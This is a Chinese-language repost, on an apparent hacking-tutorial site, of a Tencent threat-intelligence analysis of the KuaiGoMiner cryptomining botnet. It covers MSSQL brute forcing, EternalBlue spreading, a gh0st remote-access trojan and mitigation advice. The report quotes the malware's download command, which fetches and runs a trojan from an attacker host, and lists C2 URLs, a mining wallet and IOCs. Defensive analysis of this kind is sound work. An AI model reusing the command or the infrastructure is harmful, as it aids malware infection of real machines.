当前位置:首页 > 黑客教程 > 正文内容

“快Go矿工”新增 MS SQL爆破攻击,上万台电脑中招

访客56年前 (1970-01-01)黑客教程438

感谢腾讯御见威胁情报中心来稿!

原文:https://s.tencent.com/research/report/888.html

一、背景

腾讯安全威胁情报中心检测到“快Go矿工”更新,该团伙本次更新利用MSSQL弱口令爆破攻击的方式进行传播。“快Go矿工”由御见威胁情报中心于2019年10月发现,最初仅利用“永恒之蓝”漏洞进行攻击传播,因其使用的C2域名中包含“kuai-go”,腾讯安全威胁情报中心将其命名为“快Go矿工”(KuaiGoMiner)。

“快Go矿工”最新变种将挖矿程序伪装成系统进程WinInit.exe,截止目前已挖矿获得门罗币47个,市值人民币2万余元。同时,病毒在攻陷机器上植入的gh0st远控木马,具有搜集信息、上传下载文件、键盘记录、执行任意程序等多种功能,被攻陷的电脑还会面临机密信息泄露的风险。

据腾讯威胁情报中心统计数据,“快Go矿工”(KuaiGoMiner)变种已攻击上万台电脑,受害最严重地区为江苏、山东和广东。

腾讯安全提醒企业用户检查SQL服务器的SA用户口令,切勿配置弱口令登录,快Go矿工入侵后还会使用永恒之蓝系列攻击工具横向传播,植入远控木马,对政企机构信息系统安全构成严重威胁。

二、漏洞攻击

“快Go矿工” (KuaiGoMiner) 变种在攻陷的系统下载攻击模块,释放NSA武器中的“双脉冲星”、“永恒浪漫”、“永恒之蓝”漏洞攻击工具,释放到C:\Windows\Fonts\usa\目录下。

释放成功后go.vbs首先启动,然后执行go.bat,在go.bat中利用服务管理工具NS *** (释放文件名为svchost.exe)将攻击脚本cmd.bat安装为服务HTTPServers反复执行。

cmd.bat请求http[:]//scan.jiancai008.com:88/2020/local.asp和

http[:]//sex.zhzy999.net/ip2.php获取本机的IP地址,

请求http[:]//scan.jiancai008.com:88/2020/random.asp获取随机生成的C段和D段为“0.0“的IP地址,然后利用 “永恒之蓝”漏洞攻击工具针对本机同网段IP和随机生成的IP进行扫描攻击。

三、MSSQL爆破

近期KuaiGoMiner还利用MSSQL弱口令爆破进行攻击,爆破成功后首先通过shell代码写入vget.vbs作为下载者程序,然后利用vget.vbs下载PE木马sql.exe,下载命令如下:

C:/Program Files (x86)/Microsoft SQL Server/MSSQL.1/MSSQL/Binn/sqlservr.exe C:/Windows/System32/CScript.exe C:/ProgramData/vget.vbs  http[:]//sex.zhzy999.net/sql.exe C:/ProgramData/taskger.exe

sql.exe为gh0st远控木马,该木马控制电脑后,继续下载挖矿木马http[:]//go.jiancai008.com:88/2020/1.rar,然后解压释放文件到目录C:\Windows\Fonts\usa\。

将门罗币挖矿程序WinInit.exe安装为服务”WinIniter”,使用矿池:xmr-eu1.nanopool.org:14433,钱包:4Ao7AGamzR4cs4E4uK5tcFF9TR6ouXMY4LAi64jHGYQZRWYCupQ7coBGzE7BtcHBWvQFreNEMg1s9iws7ejgwZtB1gQ55Uq进行挖矿。

目前该钱包已挖矿获取门罗币47.169个,折合人民币28000余元。

四、安全建议

1.服务器使用安全的密码策略,特别是IPC$、MSSQL、RDP服务的账号密码,切勿使用弱口令;

2.根据微软公告及时修复以下Windows系统高危漏洞;

MS17-010永恒之蓝漏洞

XP、WindowsServer2003、win8等系统访问:

http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598

Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系统访问:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx

建议企业用户使用腾讯T-Sec终端安全管理系统(腾讯御点,下载链接:https://s.tencent.com/product/yd/index.html),个人用户使用腾讯电脑管家进行漏洞扫描和修复。

3.企业用户可部署腾讯T-Sec高级威胁检测系统(御界),发现、追踪黑客攻击线索。腾讯T-Sec高级威胁检测系统是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html)

IOCs

IP

64.111.27.3

Domain

sex.zhzy999.net

scan.jiancai008.com

s.jiancai008.com

go.jiancai008.com

URL

http[:]//sex.zhzy999.net/sql.exe

http[:]//go.jiancai008.com:88/2020/1.rar

http[:]//go.jiancai008.com:88/2020/2.rar

http[:]//go.jiancai008.com:88/2020/3.rar

MD5

1a5ba25af9d21f36cf8b3df7d2f55348

b87af17c857b208fcd801cb724046781

09bf2fef86d96ec9a1c3be0a020ae498

57bd72d6dc95ff57b5321a62b9f7cde2

70d3908f1b9909b7d23ee265e77dd1f9

1f1bc2ec00db3551d7700c05c87956df

05c57ccd23ab3f623bf1adda755af226

扫描二维码推送至手机访问。

版权声明:本文由黑客技术发布,如需转载请注明出处。

本文链接:https://w-123.com/33009.html

““快Go矿工”新增 MS SQL爆破攻击,上万台电脑中招” 的相关文章

Lapsus$ 再出手:泄漏 Globant 软件公司 70GB 数据

就在英国警方逮捕了 7 名嫌疑犯之后,近期非常猖獗的黑客组织 Lapsus$ 又有了新动作。在攻击微软、三星、NVIDIA 和 Okta 等公司之后,该组织再次宣布成功攻陷 Globant,后者是一家位于卢森堡的软件开发咨询公司。 在周三宣布自己“度假归来”之后,该组织在其 Telegram 频道...

TerraMaster 操作系统漏洞可能使 NAS 设备遭到远程黑客攻击

Hackernews 编译,转载请注明出处: 研究人员披露了 TerraMaster NAS设备的关键安全漏洞的细节,这些设备可以链接到未经身份验证的远程代码执行,且具有最高权限。 埃塞俄比亚网络安全研究公司 Octagon Networks 的 Paulos yibello 在分...

NCSC 向四千多家网店发警告:警惕 Magecart 攻击 会窃取客户支付数据

英国国家网络安全中心(NCSC)近日向 4000 多家网店的店主发出警告,他们的网站受到了 Magecart 的攻击影响,会窃取客户的支付信息。Magecart 攻击也称网络盗取、数字盗取或电子盗取,攻击者将被称为信用卡盗取器的脚本注入被攻击的网店,以收获和窃取顾客在结账页面提交的支付和/或个人信息...

攻击者部署后门,窃取 Exchange 电子邮件

网络安全研究人员将该 APT 组织追踪为 UNC3524,并强调在某些情况下,该组织可以对受害者环境进行超过 18 个月的访问,展示了其 “先进 “的隐匿能力。 在每一个 UNC3524 受害者环境中,攻击者都会针对一个子集的邮箱,集中其注意力在执行团队和从事企业发展、兼并和收购的员工或 IT 安...

Log4j 漏洞可能需要数月甚至数年时间才能妥善解决

网络安全专家认为 CVE-2021-44228 的普遍性以及容易被利用,这个 Log4j 中的远程代码执行漏洞可能需要数月甚至数年时间才能得到妥善解决。McAfee Enterprise 和 FireEye 的高级威胁研究主管 Steve Povolny 表示,Log4Shell 的破坏力完全和 S...

美国财政部报告:2021 年勒索事件支付赎金将近 6 亿美元 超过去年全年

根据美国财政部公布的最新报告,2021 年上半年勒索事件支付的赎金总额将近 6 亿美元,轻松超过了 2020 年全年的总额。该报告由财政部金融犯罪执法网络周五发布,重点提及了今年发生了几起高调的勒索软件攻击事件,包括 Colonial Pipeline 和肉类加工厂 JBS USA Holdings...

评论列表

惑心晕白
3年前 (2022-05-28)

86)/Microsoft SQL Server/MSSQL.1/MSSQL/Binn/sqlservr.exe C:/Windows/System32/CScript.exe C:/ProgramData/vget.vbs  http[:]//sex.zhzy9

拥嬉抹忆
3年前 (2022-05-28)

ws\Fonts\usa\目录下。释放成功后go.vbs首先启动,然后执行go.bat,在go.bat中利用服务管理工具NSSM(释放文件名为svchost.exe)将攻击

闹旅徒掠
3年前 (2022-05-28)

用服务管理工具NSSM(释放文件名为svchost.exe)将攻击脚本cmd.bat安装为服务HTTPServers反复执行。cmd.bat请求http[:]//scan.jiancai008.com:88/2020/local.asp和http[:]//sex

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。